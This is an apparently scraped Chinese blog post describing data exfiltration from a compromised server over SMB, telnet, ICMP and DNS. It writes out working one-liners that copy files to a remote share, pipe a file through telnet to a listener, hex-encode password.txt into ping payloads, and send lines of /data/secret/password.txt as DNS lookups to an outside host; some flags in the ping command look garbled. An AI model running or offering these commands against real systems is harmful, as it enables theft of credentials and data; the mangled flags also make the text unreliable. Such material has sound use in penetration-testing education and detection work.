zoukankan      html  css  js  c++  java
  • netcat/curl/wget/smb/icmp ping -p/dns/telnet

    通过SMB协议,在目标服务器和主机之间建立网络共享连接,然后将目标服务器上的文件做分享,接着就可以在主机端将分享的文件copy下来啦。操作的命令如下,

    net use h: \xxx.xxx.xxx.xxxweb /user:{username} {password} && copy {File to Copy} h:{filename}.txt

    如果telnet客户端是在远程服务器上,那么我们可以利用这个条件传输一个文件到主机的监听器上,通过以下操作命令,

    telnet xxx.xxx.xxx.xxx {port} < {file to transfer}

    ICMP

    如果你针对的目标主机已经被加固,有的工具诸如netcat, wget 或者CURL已经被移除。那对于数据库下载来说,虽然有难度,但是还是有另外的一些技术可以用的。首先,尝试让这主机ping你的机器,然后看ICMP报文是否被防火墙过滤,如果没有被过滤,而主机底层系统又是Linux的话,我们就能够将数据通过ICMP echo请求,使用“ –p flag”来进行传输文件。

    首先,我们需要将文件转换为十六进制,然后将数据插入到数据包中。这个可以通过下面的例子认识下,

    cat password.txt | xxd --16 | while read exfil; do ping -p $exfil -1 xxx.xxx.xxx.xxx; done

    跟ping命令的原理相似, DNS也能被用来进行数据库下载。这次我们将用每行数据作为一个DNS查询的主机名。通过监测网络流量,可以在我们的机器上重组数据包,还原原始文件。在这个实例中,下面的命令将作为我们请求部分提交给服务器。

    cat /data/secret/password.txt | while read exfil; do host $exfil.contextis.com 192.168.107.135; done
     
  • 相关阅读:
    Huawei vlan 配置及vlan 间通讯
    Huawei DHCP 中继配置实例
    Huawei DHCP 全局配置与接口配置
    Cisco DHCP 配置方法
    VS Code的golang开发配置 之 代码提示
    天气服务API文档 第1版
    Android 让图片等比例缩放的三种方法
    Jar mismatch! Fix your dependencies
    android ActionBarSherlock使用说明
    Only the original thread that created a view hierarchy can touch its views.
  • 原文地址:https://www.cnblogs.com/SZLLQ2000/p/5075160.html
Copyright © 2011-2022 走看看